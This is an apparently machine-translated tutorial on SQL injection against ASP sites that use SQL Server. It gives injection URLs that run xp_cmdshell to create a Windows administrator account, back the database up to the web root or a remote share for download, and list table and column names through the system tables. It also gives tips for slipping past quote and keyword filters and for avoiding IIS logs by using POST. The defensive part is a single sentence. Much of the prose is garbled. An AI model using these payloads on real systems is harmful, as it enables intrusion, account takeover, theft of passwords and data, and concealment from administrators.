In the first quarter, use the system table to inject SQLServer database SQLServer is a powerful database system, which has a close relationship with the operating system, which brings great convenience to developers, but on the other hand, it provides the injection. A springboard, let's take a look at several specific examples: 1 http://site/url.asp? Id = 1; exec master "xp_cmdshell" net user name password / add "- semicolon; in SQLServer Indicates the two sentences before and after, - indicates that the following statement is a comment, so this statement will be divided into two sentences in SQL Server, first of the SELECT Id = 1 record, then execute the stored procedure XP_cmdshell, this storage process Used to call the system command, so use the net command to create a new user name, password is Password's Windows account, then: 2 http: //site/url.asp? Id = 1; exec master..xp_cmdshell "Net Localgroup name administrators / add "- Add the new account name to the administrator group, don't have to be used, you have already got the highest authority of the system! Of course, this method is only applicable to the case where the database is connected to the SA, otherwise, there is no permission to call XP_cmdshell. 3 http://site/url.asp? Id = 1 ;; And db_name ()> 0 There is a similar example and user> 0, the role is to get the connection user name, db_name () is another system variable, return It is a connected database name. 4 http://site/url.asp? Id = 1; Backup Database database name to disk = 'c: /inetpub/wwroot/1.db'; - This is quite awkward, from 3 to Database name, plus some IIS error exposed absolute path, back up the database back to the web directory, and use HTTP to complete the entire database over the entire download, all administrators and user passwords are unfair! When you don't know the absolute path, you can also back up the method of the network address (such as //202.96.xx.xx/share/1.db), but the success rate is not high. 5 http://site/url.asp? Id = 1 ;; And (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0 said that sysobjects is the system table of SQL Server, stored All table names, views, constraints, and other objects, Xtype = 'u' and status> 0, indicating the table name established by the user, the above statement is removed, and the 0 is relatively small, let the error message table Name exposes. Second, how to get the third table name? Or leave our smart readers think.
6 http://site/url.asp? Id = 1 ;; And (select top 1 col_name (Object_ID ('Name'), 1) After getting the table name from 5, use Object_ID (' Table name ') Get internal ID, col_name (Name ID, 1) of the table name represents the first field name of the table, and replace it with 2, 3, 4 ... you can get the specified table one by one The field name inside. The above 6 points is that I have studied SQL Server injection of hardcore crystals, it can be seen that the degree of understanding of SQL Server directly affects success rate and guessing speed. After I study SQLServer injection, I also got a lot of improvement in development, huh, maybe safety and development was completed. In the second section, bypassing the program restrictions continue to inject in the entry section, there are many people like to use the 'number of injection vulnerabilities, so there are many people who use the filter' to "prevent" to inject vulnerabilities, this may block some entry Attack, but people who are more familiar with SQL, or can use the related functions to achieve the purpose of bypassing program restrictions. In the "SQL Injection" section, the statements I have use have been optimized, so that they do not include single quotes; in the "Using the System Table Inject into the SQLServer Database", some statements contain a 'number, We give an example to see how to transform these statements: Simple, such as WHERE XTYPE = 'u', the ASCII code corresponding to the character u is 85, so you can use where xtype = char (85) instead; if the character is Chinese, for example Where name = 'user', can be replaced with WHERE Name = nchar (29992) NCHAR (25143). Section III, experience summatation 1. Some people will filter these keywords, but forget the case of case sensation, so everyone can try it with Select. 2. When you can't guess the field name, you may wish to look at the login form on the website. Generally, the field name is the same name with the form of the form. 3. Special Note: The number incorporated in the address bar is interpreted as space, the% 2B is interpreted as number, and the% 25 is explained to the% number, and the specific introduction can be referred to URLENCode. 4. When injecting with GET method, IIS will record all your submission strings, do not record the POST method, so you can use the POST's URL to try not to use GET. 5. Instest the use of ASCII checking method, SQL Server can also use this method, only the difference between the two can only be exposed, but if the value of the error information can be exposed, that efficiency and Accuracy will have great improvements. The defense method SQL injection vulnerability can be described as "a thousand miles of embankment, collapsed in the ant hole", which is extremely common online, usually because the programmer does not understand, or the program is not strict, or a parameter is not strict, or a parameter is forgotten.
